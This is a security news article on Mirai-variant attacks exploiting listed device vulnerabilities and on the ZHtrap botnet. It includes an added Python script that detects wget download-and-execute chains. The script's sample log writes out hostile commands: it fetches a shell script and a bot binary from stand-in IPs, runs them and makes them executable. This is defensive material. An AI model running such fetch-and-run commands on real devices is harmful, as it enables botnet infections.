Cybersecurity researchers on Monday disclosed a new wave of ongoing attacks exploiting multiple vulnerabilities to deploy Mirai variants on compromised systems.
“Upon successful exploitation, the attackers try to download a malicious shell script, which contains further infection behaviors such as downloading and executing Mirai variants and brute-forcers,” Palo Alto Networks’ Unit 42 Threat Intelligence Team said in a write-up.
The rash of vulnerabilities being exploited includes:
- VisualDoor – a SonicWall SSL-VPN remote command injection vulnerability that came to light earlier this January
- CVE-2020-25506 – a D-Link DNS-320 firewall remote code execution (RCE) vulnerability
- CVE-2021-27561 and CVE-2021-27562 – two vulnerabilities in Yealink Device Management that allow an unauthenticated attacker to run arbitrary commands on the server with root privileges
- CVE-2021-22502 – an RCE flaw in Micro Focus Operation Bridge Reporter (OBR), affecting version 10.40
- CVE-2019-19356 – a Netis WF2419 wireless router RCE exploit, and
- CVE-2020-26919 – a Netgear ProSAFE Plus RCE vulnerability
Also included in the mix are three previously undisclosed command injection vulnerabilities that were deployed against unknown targets, one of which, according to the researchers, has been observed in conjunction with MooBot.
The attacks are said to have been detected over a month-long period, from February 16 to as recently as March 13.
Regardless of the flaws used to achieve successful exploitation, the attack chain involves using the wget utility to download a shell script from the malware infrastructure. That script is then used to fetch binaries of Mirai, a notorious malware that turns networked IoT devices running Linux into remotely controlled bots that can be used as part of a botnet in large-scale network attacks.
Besides downloading Mirai, additional shell scripts have been spotted retrieving executables to facilitate brute-force attacks to break into vulnerable devices with weak passwords.
“The IoT realm remains an easily accessible target for attackers. Many vulnerabilities are very easy to exploit and could, in some cases, have catastrophic consequences,” the researcher said.
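For defenders, the wget-based chain described above can be hunted in process-execution telemetry. The following is an added example, not code from Unit 42 or from the original article; the log format, host names, addresses and file names are constructed, and the 120-second correlation window is an assumption.

```python
import re
import shlex
from collections import defaultdict

# Constructed sample: simplified exec records "epoch host pid ppid cmdline".
# Hosts, addresses (RFC 5737 ranges) and file names are made up for illustration.
SAMPLE_LOG = """\
1615200000 cam-01 410 1 /usr/sbin/httpd -f /etc/httpd.conf
1615200005 cam-01 877 410 wget http://203.0.113.7/stage.sh -O /tmp/stage.sh
1615200006 cam-01 878 410 sh /tmp/stage.sh
1615200007 cam-01 879 878 wget http://203.0.113.7/bot.arm7 -O /tmp/bot
1615200008 cam-01 880 878 chmod 777 /tmp/bot
1615200300 nas-02 512 1 wget https://192.0.2.10/firmware/update.bin -O /tmp/update.bin
1615200400 rtr-03 301 1 wget http://198.51.100.4/setup.sh -O /tmp/setup.sh
"""

SHELLS = {"sh", "bash", "ash", "dash"}
WINDOW = 120  # assumed max seconds between a download and the run of that file

def base(path):
    return path.rsplit("/", 1)[-1]

def wget_target(argv):
    """Return the local file a wget invocation writes, or None if not wget."""
    if base(argv[0]) != "wget":
        return None
    if "-O" in argv[:-1]:
        return argv[argv.index("-O") + 1]
    urls = [a for a in argv[1:] if re.match(r"https?://", a)]
    return base(urls[0]) if urls else None

def find_chains(log):
    """Flag wget-fetched files run by a shell that then spawns wget again."""
    fetched = defaultdict(dict)  # host -> {file basename: download time}
    runners = {}                 # (host, shell pid) -> script it is running
    alerts = []
    for line in log.splitlines():
        ts, host, pid, ppid, cmd = line.split(" ", 4)
        ts, argv = int(ts), shlex.split(cmd)
        target = wget_target(argv)
        if target:
            if (host, ppid) in runners:  # downloaded script pulls a payload
                alerts.append((host, runners[(host, ppid)], target))
            fetched[host][base(target)] = ts
        elif base(argv[0]) in SHELLS and len(argv) > 1:
            seen = fetched[host].get(base(argv[1]))
            if seen is not None and ts - seen <= WINDOW:
                runners[(host, pid)] = base(argv[1])
    return alerts
```

On the constructed sample, only `cam-01` is flagged: a lone wget download (`nas-02`, `rtr-03`) does not alert unless the fetched file is executed and its process downloads again.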
New ZHtrap Botnet Traps Victims Using a Honeypot
In a related development, researchers from Chinese security firm Netlab 360 discovered a new Mirai-based botnet called ZHtrap that makes use of a honeypot to harvest additional victims, while borrowing some features from a DDoS botnet known as Matryosh.
While honeypots typically mimic a target for cyber criminals so as to take advantage of their intrusion attempts to glean more information about their modus operandi, the ZHtrap botnet uses a similar technique by integrating a scanning IP collection module for gathering IP addresses that are used as targets for further worm-like propagation.
It achieves this by listening on 23 designated ports and identifying IP addresses that connect to these ports, then using the amassed IP addresses to inspect them for four vulnerabilities to inject the payload –
“ZHtrap’s propagation uses four N-day vulnerabilities, the main function is DDoS and scanning, while integrating some backdoor features,” the researchers said. “ZHtrap sets up a honeypot on the infected device, [and] takes snapshots for the victim devices, and disables the running of new commands based on the snapshot, thus achieving exclusivity over the device.”
Once it has taken over the devices, ZHtrap takes a cue from the Matryosh botnet by using Tor for communications with a command-and-control server to download and execute additional payloads.
Noting that the attacks began on February 28, 2021, the researchers said ZHtrap’s ability to turn infected devices into honeypots marks an “interesting” evolution of botnets to facilitate finding more targets.
“Many botnets implement worm-like scan propagation, and when ZHtrap’s honeypot port is accessed, its source is most likely a device that has been infected by another botnet,” the researchers speculated about the malware’s authors. “This device can be infected, there must be flaws, I can use my scanning mechanism to scan again. This could be a good chance that I can implant my bot samples, and then with the process control function, I can have total control, isn’t that awesome?”